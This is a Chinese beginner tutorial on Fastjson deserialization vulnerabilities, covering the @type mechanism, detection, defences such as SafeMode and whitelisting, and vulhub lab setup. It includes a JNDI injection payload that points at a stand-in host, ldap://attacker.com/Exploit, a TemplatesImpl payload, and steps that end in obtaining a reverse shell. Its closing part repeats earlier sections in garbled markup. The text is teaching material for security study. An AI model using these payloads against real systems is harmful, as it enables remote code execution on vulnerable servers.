完全零基础入门Fastjson系列漏洞(基础篇)教学文档<\/h1>

一、Fastjson简介<\/h2>
Fastjson是阿里巴巴开源的一个高性能Java JSON处理库，可以将Java对象转换为JSON格式，也可以将JSON字符串转换为Java对象。<\/p>

主要特点：<\/h3>

速度快：号称最快的Java JSON解析库<\/li>
使用简单：API简洁易用<\/li>
功能强大：支持泛型、支持复杂对象<\/li>

无依赖：不需要其他第三方库<\/li> <\/ul>

二、Fastjson基本使用<\/h2>

1. 序列化(Java对象转JSON)<\/h3>

import<\/span> com.alibaba.fastjson.JSON;<\/span>
<\/span><\/span>
<\/span><\/span>User user =<\/span> new<\/span> User(<\/span>"W01fh4cker"<\/span>,<\/span> 25<\/span>);<\/span>
<\/span><\/span>String jsonString =<\/span> JSON.<\/span>toJSONString<\/span>(<\/span>user);<\/span>
<\/span><\/span>System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>jsonString);<\/span>
<\/span><\/span>\/\/ 输出: {"age":25,"name":"W01fh4cker"}
<\/span><\/span><\/span><\/code><\/pre>2. 反序列化(JSON转Java对象)<\/h3>
String jsonString =<\/span> "{\"age\":25,\"name\":\"W01fh4cker\"}"<\/span>;<\/span>
<\/span><\/span>User user =<\/span> JSON.<\/span>parseObject<\/span>(<\/span>jsonString,<\/span> User.<\/span>class<\/span>);<\/span>
<\/span><\/span>System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>user.<\/span>getName<\/span>());<\/span> \/\/ 输出: W01fh4cker
<\/span><\/span><\/span><\/code><\/pre>三、Fastjson漏洞原理<\/h2>
Fastjson反序列化漏洞的核心在于其自动类型转换机制和@type<\/code>特性。<\/p>
关键点：<\/h3>

Fastjson在反序列化时可以通过@type<\/code>指定反序列化的类<\/li>
攻击者可以构造恶意的JSON字符串，指定特定的类进行实例化<\/li>
某些类在实例化时会自动执行危险操作(如JNDI查询、RMI调用等)<\/li>
<\/ol>
四、Fastjson反序列化漏洞利用<\/h2>
1. 利用条件<\/h3>

目标使用Fastjson进行JSON反序列化<\/li>
目标环境中存在可利用的gadget链<\/li>
Fastjson版本存在漏洞<\/li>
<\/ul>
2. 常见利用方式<\/h3>
JNDI注入利用<\/h4>
{
<\/span><\/span>    "@type"<\/span>: "com.sun.rowset.JdbcRowSetImpl"<\/span>,
<\/span><\/span>    "dataSourceName"<\/span>: "ldap:\/\/attacker.com\/Exploit"<\/span>,
<\/span><\/span>    "autoCommit"<\/span>: true<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>TemplatesImpl利用<\/h4>
{
<\/span><\/span>    "@type"<\/span>: "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"<\/span>,
<\/span><\/span>    "_bytecodes"<\/span>: ["恶意字节码"<\/span>],
<\/span><\/span>    "_name"<\/span>: "a.b"<\/span>,
<\/span><\/span>    "_tfactory"<\/span>: {},
<\/span><\/span>    "_outputProperties"<\/span>: {}
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>五、Fastjson漏洞检测<\/h2>
1. 版本检测<\/h3>

直接查看pom.xml或gradle.build文件<\/li>
使用JSON.VERSION<\/code>获取版本信息<\/li>
<\/ul>
2. DNS探测<\/h3>
构造特殊的JSON请求，观察是否有DNS查询：<\/p>
{
<\/span><\/span>    "@type"<\/span>: "java.net.Inet4Address"<\/span>,
<\/span><\/span>    "val"<\/span>: "dnslog.cn"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>六、Fastjson漏洞防御<\/h2>
1. 升级版本<\/h3>

升级到最新安全版本(目前最新安全版本为1.2.83+)<\/li>
<\/ul>
2. 安全配置<\/h3>
\/\/ 开启SafeMode(1.2.68+)
<\/span><\/span><\/span><\/span>ParserConfig.<\/span>getGlobalInstance<\/span>().<\/span>setSafeMode<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 或使用白名单
<\/span><\/span><\/span><\/span>ParserConfig.<\/span>getGlobalInstance<\/span>().<\/span>addAccept<\/span>(<\/span>"com.yourpackage."<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>3. 其他措施<\/h3>

关闭Fastjson的autotype功能<\/li>
使用Jackson或Gson等更安全的JSON库<\/li>
<\/ul>
七、Fastjson漏洞历史<\/h2>

Fastjson <= 1.2.24 反序列化漏洞<\/li>
Fastjson <= 1.2.47 远程代码执行漏洞<\/li>
Fastjson <= 1.2.62 拒绝服务漏洞<\/li>
Fastjson <= 1.2.66 反序列化漏洞<\/li>
Fastjson <= 1.2.80 反序列化漏洞<\/li>
<\/ol>
八、实验环境搭建<\/h2>
建议使用vulhub快速搭建测试环境：<\/p>
git clone https:\/\/github.com\/vulhub\/vulhub.git
cd vulhub\/fastjson\/1.2.24-rce
docker-compose up -d
<\/code><\/pre>
九、漏洞复现步骤<\/h2>

准备恶意RMI\/LDAP服务<\/li>
编译恶意Java类并托管<\/li>
构造恶意JSON请求<\/li>
发送请求触发漏洞<\/li>
获取反弹shell或执行命令<\/li>
<\/ol>
十、相关工具<\/h2>

marshalsec<\/a> - 快速启动恶意的RMI\/LDAP服务<\/li>
JNDI-Injection-Exploit<\/a> - JNDI注入利用工具<\/li>
fastjson-blacklist<\/a> - Fastjson黑名单检测工具<\/li>
<\/ol>
十一、深入学习资源<\/h2>

官方文档: https:\/\/github.com\/alibaba\/fastjson\/wiki<\/li>
漏洞分析: https:\/\/paper.seebug.org\/1192\/<\/li>
开源项目: https:\/\/github.com\/W01fh4cker\/LearnFastjsonVulnFromZero-Basic<\/li>
<\/ol>
十二、总结<\/h2>
Fastjson漏洞的核心在于不安全的反序列化机制，通过@type<\/code>特性可以指定任意类进行实例化。防御的关键在于限制反序列化的类范围，或升级到已修复的安全版本。对于安全研究人员，理解Fastjson的工作原理和漏洞利用链是至关重要的。<\/p>

完全零基础入门Fastjson系列漏洞(基础篇)教学文档<\/h1>

一、Fastjson简介<\/h2> Fastjson是阿里巴巴开源的一个高性能Java JSON处理库，可以将Java对象转换为JSON格式，也可以将JSON字符串转换为Java对象。<\/p>

二、Fastjson基本使用<\/h2>

三、Fastjson漏洞原理<\/h2> Fastjson反序列化漏洞的核心在于其自动类型转换机制和@type<\/code>特性。<\/p>

四、Fastjson反序列化漏洞利用<\/h2>

2. 常见利用方式<\/h3>

五、Fastjson漏洞检测<\/h2>

六、Fastjson漏洞防御<\/h2>

一、Fastjson简介<\/h2>
Fastjson是阿里巴巴开源的一个高性能Java JSON处理库，可以将Java对象转换为JSON格式，也可以将JSON字符串转换为Java对象。<\/p>

三、Fastjson漏洞原理<\/h2>
Fastjson反序列化漏洞的核心在于其自动类型转换机制和`@type<\/code>特性。<\/p>`